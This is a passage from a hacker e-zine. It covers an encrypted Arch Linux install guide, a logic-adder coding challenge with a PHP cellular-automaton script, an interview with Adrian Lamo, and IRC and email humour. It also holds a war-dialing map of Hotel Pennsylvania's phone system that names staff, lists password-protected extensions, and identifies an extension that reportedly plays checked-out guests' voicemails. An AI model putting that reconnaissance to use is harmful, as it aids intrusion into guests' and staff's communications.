/dev/sdb1 * 2048 616447 307200 83 Linux
/dev/sdb2 616448 7856126 3619839+ 83 Linux
== Creating a /boot ==
Next, I create an ext3 filesystem on /boot
# mkfs.ext3 -L shadowboot /dev/sdb1
== Encrypting root ==
At this point, you may need to load the fuse module that TrueCrypt uses (it may autoload on its own
though).
# modprobe fuse
It shouldn't output anything, and if it does, you have a problem. Make sure it's installed. :3
Then, create a TrueCrypt container for the root filesystem.
# truecrypt -t -c /dev/sdb2
Follow through the instructions provided and create a "Normal" volume. The rest of the options are
up to the user. This will format the drive, erasing all data on it. TrueCrypt wipes the drive unless
told not to using the --quick option, so use --quick if you feel inclined.
NOTE: The password is everything, so don't make it too short or use a dictionary word, and don't use
a keyfile unless you have somewhere safe to store it like a flash drive or something. Also, NEVER
store the keyfile in /boot (should be a given). It's like leaving the key to a safe in the keyhole.
If you choose to use a filesystem as "None", or if you want another filesystem, then you need to
format it as so after mounting the device.
== Formatting Root ==
Open the container:
# truecrypt -t --filesystem=none --slot=15 /dev/sdb2 # Remember this slot number for later
There should now be a /dev/mapper/truecrypt15 block device. This is the container. If you are not
satisfied with the filesystem or don't have one, reformat it to your liking. I used btrfs because of
the compression. At the time of this writing, however, I don't suggest you do the same because btrfs
is still in development and potential bugs may cause data loss.
# mkfs.btrfs -L shadowcrypt /dev/mapper/truecrypt15
= Mounting The Filesystems =
Now that the crypt is opened and formatted, mount the device.
# mkdir /newarch
# mount /dev/mapper/truecrypt15 /newarch
If you are using btrfs like me and want compression, do this instead:
# mount -t btrfs -o compress /dev/mapper/truecrypt15 /newarch
NOTE: I used a subvolumes on mine. ;) Let's see if you can figure out how to do it (only for
btrfs).
Mount /boot:
# mkdir /newarch/boot && mount /dev/sdb1 /newarch/boot
= Installing ArchLinux =
Now, install the system to /newarch. Most of this comes from the Arch Linux wiki
(http://wiki.archlinux.org/index.php/Install_from_Existing_Linux).
If you aren't comfortable with these commands, then read the <command> --help. Basically, all the
following does is ready the system for pacman (the Arch Linux package manager); install the base
system with TrueCrypt and sudo; mount the proc, sys, and dev directories; chroot into the system;
install the kernel (again); install the TrueCrypt hook for the initrd; and install grub. :)
First, edit /etc/pacman.d/mirrorlist and uncomment a mirror to download packages from.
# mkdir -p /newarch/var/lib/pacman
# pacman -Syy -r /newarch
# pacman -S base grub2 base-devel truecrypt sudo -r /newarch
# cd /newarch/dev
# rm console; mknod -m 600 console c 5 1
# rm null; mknod -m 666 null c 1 3
# rm zero; mknod -m 666 zero c 1 5
# cp /etc/resolv.conf /newarch/etc/resolv.conf
# cd /newarch
# mount -t proc proc proc/
# mount -t sysfs sys sys/
# mount --bind /dev/ dev/
# chroot . /bin/bash
# pacman -S kernel26 # should already be installed but double check
# useradd --home /build/ --create-home --user-group build
# mkdir -p /build/build/mkinitcpio-truecrypt/
# cd /build/build/mkinitcpio-truecrypt/
# wget http://aur.archlinux.org/packages/mkinitcpio-truecrypt/mkinitcpio-truecrypt.tar.gz
# tar -xvzf mkinitcpio-truecrypt.tar.gz
# chown -R build:build /build/
# sudo -u build makepkg
# pacman -U ./mkinitcpio-truecrypt*.pkg.tar.*
# grub-install --no-floppy /dev/sdb # Remember to use -your- device here
= Configuring Grub2 =
Edit /boot/grub/grub.cfg and add:
tcdevice=<device>:<slotnum>
to the command line boot arguments (starts with linux within a menuentry block), and change
"root=<device>" to "root=/dev/mapper/truecrypt<slotnum>".
WARNING: Sometimes devices can change device nodes after boot. It is HIGHLY recommended that you do
persistent block device naming. You can learn more about this at
http://wiki.archlinux.org/index.php/Persistent_block_device_naming#by-id_and_by-path. Truecrypt
volumes don't have an UUID, so use by-id because that will work on just about any computer (great
for USBs). Your tcdevice should end up looking like "tcdevice=/dev/disk/by-id/<id>". It would also
benefit you to replace "root=/dev/mapper/truecrypt<slotnum>" with the UUID of your root filesystem.
Use the `bklid` command to find this information.
NOTE: Truecrypt has a max slot num of 64 and starts at 1, so stay within that range.
= Configuring the System =
Now that the system is installed, it's time make the init root directory (initrd).
Edit /etc/mkinitcpio.conf, read the notes, and add 'truecrypt' before 'filesystems' in the HOOKS
string. If you are using a USB stick, add 'usb' before 'truecrypt' and 'filesystems' (They are run
in the order given in the array).
NOTE: If you are using a btrfs root filesystem, then add the following to the MODULES string:
crc32c libcrc32c zlib_deflate btrfs
Now for the kernel:
# mkinitcpio -p kernel26
Read the Arch Linux wiki link above and install whatever else you want and edit the settings. And
add the devices to fstab, chances are the device nodes in /dev/ will change (e.g. sdb to sda etc) so
I suggest you use UUID for the tcdevice in the kernel command line args and fstab
...And that should be it! If you have any trouble, feel free to contact me in the IRC channels list
at the top of the article. If you want, you can also check #archlinux on irc.freenode.net and see if
anyone around can help you there.
'Tis all from second. And remember, nothing is impossible with God (whatever, haters gonna hate).
[==================================================================================================]
-=[ 0x0b Programming Challenge
-=[ Author: storm
-=[ Email: storm@gonullyourself.org
-=[ Website: http://gonullyourself.org/
In Computer Science (and electronics in general), an adder is a circuit by which simple addition is
performed by passing input bits through a series of logic gates (e.g., AND, OR, XOR) and returning
the result. Many different adder designs exist, depending on what exactly you are trying to
achieve.
Your challenge this issue is to further research adders and write a program that performs addition
of inputted bits using only logic gates. Three levels of this challenge exist, each one being
progressively more complex to code.
Level 1: Write a half adder
A half adder is the simplest adder circuit. It accepts two input bits A and B and returns two
output bits S and C. S stands for the "sum" of the two bits, and C stands for the "carry" bit (if
produced). The logical design of a half adder is very simple and easy to follow, but a key
shortcoming is that it does not accept a carry bit as input, so its use in calculation is limited.
A black box diagram of a half adder would look like:
______________
| |
A --->| |---> S (sum)
| Half Adder |
B --->| |---> C (carry)
|______________|
Level 2: Write a full adder
A full adder is a more complex adder circuit that returns the same output as a half adder but
accepts a carry bit as input. Because of this, full adders are more universally implemented. A
full adder accepts three input bits A, B, and Cin (carry input) and returns two output bits S (sum)
and Cout (carry output).
A black box diagram of a full adder would look like:
______________
| |
A --->| |---> S (sum)
| Full Adder |
B --->| |---> Cout (carry out)
|______________|
^
|
Cin
(carry in)
Level 3: Write a ripple carry adder
A ripple carry adder is essentially a series of full adders that is able to perform addition on
binary numbers with multiple digits. When one full adder completes its computation, the carry out
bit is then passed to the next full adder as the carry in bit. Because there is no carry in bit for
the addition of the first digits, a half adder may be the first (but only the first) step in a
ripple carry adder.
A black box diagram of a ripple carry adder would look like:
A2 B2 A1 B1 A0 B0
| | | | | |
__\/______\/__ __\/______\/__ __\/______\/__
| | | | | |
C3 | | C2 | | C1 | |
... <----| Full Adder |<----| Full Adder |<----| Full Adder |<---- C0
| | | | | |
|______________| |______________| |______________|
| | |
\/ \/ \/
S2 S1 S0
Submissions may be written in any programming or scripting language. Correct, acceptable, and
innovative solutions will be published in the next issue of GNY Zine, and their authors will be
recognized. Solutions may be submitted by:
- Forum (http://gonullyourself.org/board/)
- IRC (irc.distrust.us #gny)
- Email (zine@gonullyourself.org)
Excellent resources for further information on adders and logic gates:
http://en.wikipedia.org/wiki/Adder_%28electronics%29
http://en.wikipedia.org/wiki/Logic_gate
http://www.play-hookey.com/digital/adder.html
--------------------------------------------------------------------------------
Last issue, I challenged readers to write a program that would generate elementary cellular automata
and display the resulting figures in a dynamic and interesting fashion. One submission was received
from ardnew, who wrote a program in php that generates a cellular automaton by controlling the
background color of cells in HTML tables.
-=-=-
<?php
$NUM_RULES = 8;
$NUM_LINES = 150;
$rule_table = array();
function int2bitvec($l, $n)
{
$s = array();
while($l--)
{
array_unshift($s, ($n >> $l) & 1);
}
return $s;
}
function bitvec2str($s)
{
return join('', array_reverse($s));
}
function build_rules($l, $n)
{
global $rule_table;
$v = int2bitvec($l, $n);
for($i = 0; $i < $l; ++$i)
{
$t = int2bitvec(log($l, 2), $i);
$rule_table[bitvec2str($t)] = $v[$i];
}
}
function line_length($i)
{
return 2 * $i + 1;
}
echo '<html>';
echo '<head><title>Linear Cellular Automata</title></head>';
echo '<body>';
echo '<form action="'.$_SERVER['PHP_SELF'].'">';
echo 'Enter a rule (0-255): ';
echo '<input type="text" name="n" />';
echo '<input type="submit" value="Go!" />';
echo '</form><br /><br />';
if(isset($_GET['n']))
{
echo '<table border="0" cellspacing="1">';
$n = $_GET['n'];
build_rules($NUM_RULES, $n);
$prev_line = '';
$curr_line = '1';
$pad_print = '';
$line_print = '';
$pad = "";
for($i = 0; $i < $NUM_LINES; ++$i)
{
echo '<tr>';
$prev_line = $curr_line;
$curr_line = '';
$pad = str_repeat(0, ((line_length($NUM_LINES) + 2) - line_length($i)) / 2);
$pad_print = preg_replace('/0/', '<td bgcolor="white"></td>', $pad);
if(preg_match('/1/', $prev_line))
{
$line_print = preg_replace('/1/', '<td bgcolor="black"></td>', $prev_line);
}
if(preg_match('/0/', $prev_line))
{
$line_print = preg_replace('/0/', '<td bgcolor="white"></td>', $line_print);
}
echo($pad_print . $line_print . $pad_print);
for($c = 0, $j = (line_length($NUM_LINES) - line_length($i)) / 2 - 1; $c < line_length($i +
1); ++$c, ++$j)
{
$curr_line .= $rule_table[substr($pad . $prev_line . $pad, $j, 3)];
}
echo '</tr>';
}
echo '</table>';
}
echo '</body>';
echo '</html>';
?>
[==================================================================================================]
-=[ 0x0c Exploring Hotel Pennsylvania's PBX
-=[ Author: Shadytel, Inc
-=[ Website: http://www.shadytel.com/
What better time to have fun with Hotel Penn's phone system than at the Hackers on Planet Earth
conference? We found that the PBX was very buggy and inconsistent, leading to some weird findings.
For instance, some extensions are able to be dialed directly from within the hotel (at a courtesy
phone), while others are unreachable from the IVR prompt but become reachable if dialed by the
operator. Also, some extensions are only reachable via IVR prompt. Sometimes, preceding an extension
with 9 will drop you to that extension's voicemail, and pressing # during a VMB greeting sends you
to the IVR. The PBX will drop you back to the IVR prompt if it encounters any unhandled exceptions.
Extension 555 is the name directory; 654 may be used to listen to voicemails of any checked out
guest; and 632 ("Sandy Simmons") is the admin extension, but we weren't able to access it.
100 - VMB - "Express Checkout"
101 - VMB - "Express Checkout"
102 - VMB - "Express Checkout"
103 - VMB - "Express Checkout"
104 - VMB - "Express Checkout"
105 - VMB - "Express Checkout"
106 - VMB - "Express Checkout"
107 - VMB - "Express Checkout"
108 - VMB - "Express Checkout"
109 - VMB - "Express Checkout"
120 - ring out
190 - ring out
198 - ring out
199 - ring out
8600 - HELO - "Sky Top Ballroom"
8601 - VMB
8602 - HELO
8603 - VMB - "18th floor" (the extension dialed from)
8604 - VMB
8605 - VMB
8606 - VMB
8607 - reorder
8608 - VMB
8609 - VMB
8610 - reorder
8611 - VMB
8612 - VMB
8613 - HELO - "Domino's Pizza" (lol)
8614 - VMB
8615 - VMB
8616 - reorder
8617 - VMB
8618 - VMB
8619 - VMB
8620 - VMB
8621 - VMB - "Gary Smith"
8622 - VMB - "Tina"
8623 - VMB - "Sam ???"
8624 - reorder
8625 - reorder
8626 - VMB
8627 - reorder
8628 - reorder
8629 - reorder
8630 - reorder
8631 - ring out
8632 - ring out
8633 - VMB
8634 - VMB
8635 - ring out
8636 - reorder
8637 - reorder
8638 - VMB
8639 - reorder
8640 - VMB
8641 - VMB
8642 - VMB
8643 - VMB
8644 - reorder
8645 - VMB
8646 - VMB
8647 - VMB
8648 - ring out
8649 - reorder
8650 - IVR
8651 - reorder
8652 - VMB
8653 - reorder
8654 - "Security" (not sure if HELO or VMB, hung up quickly)
8655 - reorder
8656 - VMB
8657 - ring out
8658 - ring out
8659 - ring out
8660 - VMB - "Joanna Kyen"
8661 - VMB - "Penn Plaza Pavillion"
8662 - VMB
8663 - VMB
8664 - HELO
8665 - HELO
8666 - HELO - "4th floor"
8667 - HELO - "?th floor"
8668 - HELO - "Seven"
8669 - HELO - "This is seven"
8670 - HELO
8671 - ring out
8672 - ring out
8673 - HELO
8674 - HELO
8675 - HELO
8676 - IVR
8677 - reorder
8678 - ring out
8679 - HELO
8680 - reorder
8681 - reorder
8682 - reorder
8683 - ring out
8684 - reorder
8685 - VMB
8686 - VMB
8687 - VMB
8688 - ring out
8689 - IVR
8690 - reorder
8691 - reorder
8692 - reorder
8693 - VMB
8694 - VMB - "medical manager Matt Rowes"
8695 - VMB - "Diana Carpenter"
8696 - reorder
8697 - reorder
8698 - reorder
8699 - reorder
8800 - ring out
8801 - ring out
8802 - reorder
8803 - VMB
8804 - VMB
8805 - reorder
8806 - reorder
8807 - ring out
8808 - IVR
8809 - reorder
8810 - IVR
8811 - HELO - "I don't want any!" *hangup*
8812 - reorder
8813 - IVR
8814 - reorder
8815 - operator
8816 - IVR
8817 - reorder
8818 - busy (the extension dialed from)
8819 - IVR
8820 - reorder
8821 - reorder
8822 - operator
8823 - reorder
8824 - HELO - "Sup girl, sup? Uhhhhhhhhhhhhhhhhhh.........................."
8825 - IVR
8826 - VMB
8827 - reorder
8828 - reorder
8829 - IVR
8830 - IVR
8831 - reorder
8832 - ring out
8833 - ring out
8834 - reorder
8835 - IVR
8836 - reorder
8837 - ring out
8838 - reorder
8839 - reorder
8840 - reorder
8841 - reorder
8842 - IVR
8843 - IVR
8844 - ring out
8845 - IVR
8846 - IVR
8847 - IVR
8848 - reorder
8849 - reorder
8850 - IVR
8851 - IVR
8852 - IVR
8853 - IVR
8854 - IVR
8855 - IVR
8856 - IVR
8857 - IVR
8858 - VMB
8859 - IVR
8860 - IVR
8861 - IVR
8862 - IVR
8863 - IVR
8864 - beep beep beep
8865 - IVR
8866 - IVR
8867 - reorder
8868 - reorder
8869 - IVR
8870 - IVR
8871 - IVR
8872 - IVR
8873 - reorder
8874 - IVR
8875 - IVR
8876 - IVR
8877 - IVR
8878 - IVR
8879 - IVR
8880 - reorder
8881 - VMB
8882 - reorder
8883 - IVR
8884 - VMB
8885 - reorder
8886 - VMB
8887 - reorder
8888 - operator
8889 - reorder
8890 - Hotel Expert, asks for password
8891 - Hotel Expert, asks for password
8892 - Hotel Expert, asks for password
8893 - reorder
8894 - Hotel Expert, asks for password
8895 - reorder
8896 - reorder
8897 - reorder
8898 - VMB
8899 - VMB
[==================================================================================================]
-=[ 0x0c Interview with Adrian Lamo
With all of the recent news about Wikileaks, who hasn't heard of Adrian Lamo? But this isn't the
first time he's made national headlines. We set out to learn more about Adrian himself, his past as
a high-profile hacker, and his thoughts on current debates in the scene today.
Before we began, Adrian wanted to express:
I'd like to point you to three hyperlinks that you can read at your leisure - perhaps while I
type answers - they're brief. They're essential to understanding me, in a way.
One is about why I answer in hyperlinks so often. Someone I respect wrote it. It's:
http://lucidstranger.blogspot.com/2007/02/poem-experience.html
The 2nd is about not rushing to put me on a pedestal or demonize me too quickly. I'm human, like
everyone else. http://users.resist.ca/~adrian/kokoro.htm
The last is about interpreting my words. It's: http://adrian.adrian.org/zot.htm
What is your opinion on the disclosure of vulnerabilities and proof-of-concept exploits? Do you
believe in full disclosure, and should security researchers notify affected vendors prior to their
announcements?
I believe in a general principal of courtesy, and ensuring that announcements/disclosures don't
adversely affect users by way of unpatched vulnerabilities. However, vendors with a history of
working poorly with the security community or engaging in poor corporate citizenship should
periodically be made examples of. After all, if you can't be a good example, you can always be a
terrible warning.
I'm generally in favor of full disclosure, with the repeated caveat that we should be gentlemen
about it. That being said, full disclosure and proofs-of-concept when no patch exists
isn't/aren't always inappropriate. The security community - on all levels - does not exist to
guarantee safety for all. Sometimes it's healthy for entities to learn that they're vulnerable
via a phone call from the press. Part of the mission of the security community is inherently to
irritate, and in so doing, force the creation of pearls; to produce corporate, technological,
and societal evolution. It is not here to make failure painless and lesson-free.
If you have watched Hackers Wanted, my closing monologue is something of an example of what I'm
talking about here.
Many news stories talk about the curiosity you possess in everything, not just computers. What is
the most interesting thing you have ever found and/or accessed in your urban explorations?
The most famous one is, of course, the kitten that's covered in Kevin Mitnick's book. But my
favorite memory is an abandoned power plant along the banks of the James River in Richmond, VA.
It was very steampunk, with labyrinthine tunnels and floors that gave way to deep underlevels.
I explored it for days on end, taking pictures. Sometimes you'd turn corners and be confronted
with a ghostly figure, only to realize it was an amazingly detailed mural barely illuminated in
the twilight. Dominion Power, I miss you.
Of course, they're all unique in their own way, and they're all fading, one by one, sometimes
literally, as the song goes, paved ... and put up a parking lot. The InformationWeek cover story
on me had its photos shot in one of my abandoned buildings literally as crews were tearing it
down. Google Earth shows a parking structure there today.
The Western Union Telegraph (yes, just telegraph, no money orders when it was built) building in
Philly is gone, more gentrification. Thanks gentrification, we needed that Starbucks.
My most surreal one was in the roof of the cathedral at the Cathedral of Learning in Pittsburgh.
The trash and debris got older and older as you made your way through. I popped out the other
end through a ventilation shaft ... in the (empty, at that hour) network room.
Like I said, all unique, all dwindling, never to be repeated.
What motivated you to become a hacker? Was there anyone in your life who served as an inspiration?
Nothing motivated me. I always was. It's something you're born into, not something you can ape
with any number of classes or certifications. You have to love learning.
I never had any heroes or inspirations. It's still surreal to me when ex-LoD/H people contact
me - I grew up reading old Legion of Doom Technical Journals on BBS systems - but they're just
people, like me.
The only person who really stirred my love of technology - apart from my dad - was my 9th grade
computer science teacher, Douglas Keachie. We were nominally enemies at the time, but the
adversity inspired me to learn. We remember each other much more fondly 15 years later. ;>
Have you ever dabbled in other disciplines of technology, such as phone phreaking or hardware
hacking?
The short answer is yes. I'd refer you to paragraph 2 of:
http://www.sfweekly.com/2003-04-16/news/a-duty-to-hack/2/ - some of the things that run our
country are very vulnerable. The FBI intervened before I was able to make a disclosure. I don't
know if I ever will. I do know that sources tell me not much has changed.
Do you regularly attend any hacking conferences other than HOPE? Which conference (and year) has
been your favorite, and why?
I attend Defcon, and I've enjoyed Summercon. Defcon V, my first Defcon, was undoubtedly also my
favorite one in the Defcon series. It was on the cusp before Defcon turned more corporate, and
it was my first real hacking conference. It had everything - getting mistaken for a fugitive,
being stranded in Vegas, meeting new people, and simply being anonymous - meeting people with no
preconception of what type of person I am.
In terms of HOPE, I enjoyed this year the most. It was epic-level fun. I enjoyed every minute of
it. Many more people were quietly friendly than were vocally intrusive. I don't think the latter
realized how much of a kick I got out of them.
I will say, it was funny to see the reactions of anti-Adrian people at the panel.
I don't really consider them anti-Adrian. To be anti-Adrian, they'd have to know Adrian. They
know my persona, my public preconceptions, my idoru. None of these things are me. Because of
this, there's a certain disconnect when they speak out - to me, they're talking about someone
else.
How has being diagnosed with Asperger's Syndrome affected your life? Do you believe it plays a role
in your hacker mindset?
I honestly don't know yet. It's too soon for me to say how it's affected my life, if at all. I
feel I understand myself better. But I still think the word is a label for something we don't
fully understand.
Do you believe that formal education plays a positive or negative role in the learning experience of
hackers, and why?
I think formal education plays a positive role in the learning experience, but not in the way
that's strictly intended. Nobody ever learned to be a great writer in English class. Instead, it
prepares differently oriented minds for adversity, and for taking unintended lessons from human
events - something that's very hackerish, in my opinion, learning to sink or swim at the art of
gleaning value from a wasteland of ineffective techniques and irrelevant data.
The media has frequently referred to you as the "homeless hacker" for sleeping in abandoned
buildings and traveling the country via bus. Are you still upholding this lifestyle, and do you
recommend it to others?
I don't recommend anything to others, beyond making their own choices and enriching the total of
human events by seeking out new situations, circumstances, and experiences.
I still travel by bus and rail, but couch surf more than I crash in random places. I haven't
stopped, but I don't have time for it to be a lifestyle anymore. And, more importantly, it's no
longer new to me - I want to keep my brain active and engaged with new approaches to life,
rather than repeating the old.
We've mainly avoided the issue with Wikileaks and Bradley Manning. However, is there anything you
wish to say about the situation? Also, before the whole ordeal, if you were to switch places with
Manning, would you have leaked the Collateral Murder video and diplomatic cables yourself?
Because I'm not Manning, and can't switch places with him, or go back in time, I can't say what
I would do in his place. However, based on my previous actions, I would never have released the
cables. PFC. Manning has a good heart, but not a good sense of justice, perspective, or loyalty.
That said, if he had just leaked the so-called Collateral Murder video, I would not have exposed
his actions, because that was a fairly harmless leak, and the harm to him would outweigh any
potential harm prevented.
Thank you for your time. Is there anything else you would like to add before we conclude?
The only thing I'll add is that sometimes in life, you're presented with no good choices, only
less-bad ones, and you'll be hated by some sectors no matter what you do. I took the menu of bad
choices and elected the one I felt served the needs of the many. No one can know what that's
like until they've had to make that call.
-=-=-
If you would like to weigh in on the interview, the Wikileaks controversy, or anything
Adrian-related, our contact information is in the introduction - we will publish intelligent
arguments and opinions (both for and against) in the next issue.
[==================================================================================================]
-=[ 0x0e Et Cetera, Etc.
-=[ Author: teh crew
With the rant finished from last issue's Et Cetera, Etc., this time we're just going to throw a
bunch of whatever in here and see what happens. A bit of personalization, ya know? ;)
GNY goes to HOPE!
----------------------------------------------------------------------------------------------------
The Next HOPE was a blast. storm, m0nkee, c1rcuit, and HIT_007 hung out and had a netbook/laptop
orgy at the good 'ol Hotel Pennsylvania for the weekend, representing GNY well. Media and various
shitz from the conference are posted up at http://gonullyourself.org/hope/. You will see a link to
our QR code there - it was an idea we had while at the con. We got ASCII goatse'd by scanning one...
it made sense that we make our own. It linked to a simple message board that we created for people
to communicate during the con. It went pretty well, and although being put up rather late, still was
a success.
Moving on, the talks were done well for the most part. The social engineering panel was fun as
always, but the biggest and most popular story was of course the Wikileaks vs. Adrian Lamo
controversy. Mr. Lamo was in attendance and us HOPE-goers were given a chance to ask him questions.
People were mature about that... for the most part. The only real complaint would be that there was
definitely room for more technical talks and topics other than privacy, but 2600 has always been
pretty political. In any event, for those who have never been to HOPE or a conference in general, it
is certainly recommended. GNY road trip to Defcon next year..? :D
#telephony shenanigans!
----------------------------------------------------------------------------------------------------
* HACKER (~HACKER@99.56.199.228) has joined #telephony
<HACKER> BEAVE
<HACKER> I WANT MY ACCESS TO TELEPHREAK
<HACKER> TELEPRHEAK IS FULL OF NEW PEOPLE
<HACKER> I HAVE YOU DEFCON
<HACKER> BEAVE KICKED ME OUT
<HACKER> LADYNIKON
<HACKER> THEY DON'T KNOW IM A HACKER MODE
<HACKER> DEFCON IS LOCATED IN LOS ANGELES ?
<HACKER> HONESTLY TELEPHREAK
<HACKER> I AM A HACKER/PHREAKER/CRACKER
<HACKER> YOU KNOW IT DOES NOT MATTER IF I LEAVE MY TRACE ON THE LOGINS
<HACKER> SOON IT WILL MATTER
<HACKER> DEFCON NEEDS TO SEE LOS ANGELES TALKEE
<HACKER> BEAVE IS A PHREAKER?
<HACKER> A HACKER TYPE?
<HACKER> BEAVE KNOWS MY IP
<HACKER> BEAVE
<HACKER> CONTACT ME
<HACKER> THROUGH SSH
<HACKER> COME HERE BEAVE
<HACKER> BEAVE IS NO HACKER
<HACKER> REMEMBER THAT
<HACKER> BEAVE AND LADYNIKON ARE JUST NEW
<HACKER> LADY NIKON IS NO HACKER
<HACKER> BEAVE IS NO HACKER
* HACKER (~HACKER@99.56.199.228) Quit (Quit: Leaving)
(By the way, does anyone know who this fellow is? He also goes by the name looptroop and has been
regularly talking to himself in #telephony and #phreak on 2600net about nonsensical conspiracy
theories for almost a year now. Dude has some persistence. @_@)
Better than disk encryption!
----------------------------------------------------------------------------------------------------
<OrderZero> open up the case OUT OF NOWHERE FUCKING DEADLY SPIDERS
<OrderZero> and a snapper turtle
<OrderZero> just for fun
<Snoopy> did you recover the harddrive .... no sir it was guarded by a 175 lb snapping turtle
<Snoopy> lets let this one go
<OrderZero> his name was alph
<OrderZero> and while his name sounded whimsical and friendly I disagreed with his views on politics
Wait, what?
----------------------------------------------------------------------------------------------------
Date: Sat, 11 Sep 2010 07:01:30 +0530
Subject: Banner Exchange
From: Indian Cyber Army <evil.hackerz.999@gmail.com>
To: hixmostorm@hotmail.com
Hi,i m the owner of Indian Cyber Army (ICA) @ http://cyberarmy.in
I see ur site . Its really nice,We are now allowing and inviting webmasters to do Banner Exchange.
That will make Profit for both both of us. Indian cyber army is totaly a Cyber security Community.
Hope you know already about it.So,I need members of cyber feild,and u need traffic and backlink.
Waiting for you positive reply...
Owner,ICA.
-=-=-
Date: Sat, 11 Sep 2010 22:11:08 -0400
Subject: RE: Banner Exchange
From: storm gny <hixmostorm@hotmail.com>
To: <evil.hackerz.999@gmail.com>
Hi ICA,
Thank you for considering us for a link exchange. I've passed on your request to the members of the
GNY review board, and we'll get back to you within the week. It usually takes only a few days, but
we're busy arranging the funeral for m0nkee since he got hit by a bus on Thursday. Wrong place,
wrong time I guess. Anyways, talk to you soon.
Regards,
John Travolta
-=-=-
Date: Sun, 12 Sep 2010 08:25:29 +0530
Subject: Re: Banner Exchange
From: Indian Cyber Army <evil.hackerz.999@gmail.com>
To: storm gny <hixmostorm@hotmail.com>
OKay,me also will add a new page on my site for banner exchage,there ur logo will be added,after i
getting ur response that u add my banner on ur site.
Thankyou.
Admin,ICA.
...>_>
Anyways, it looks like you've reached the end of GNY Zine, Issue #2. The next issue is already in
progress, so (if everything goes according to plan), we'll see you again in January. Our contact
information is in the introduction, and we'll try our best to respond to your messages within a
reasonable time. If you have content for future issues, send it in!
As always, may your hax be plentiful and full of fish.
Oh, and red boxing isn't dead.
<3, the gny crew
[==================================================================================================]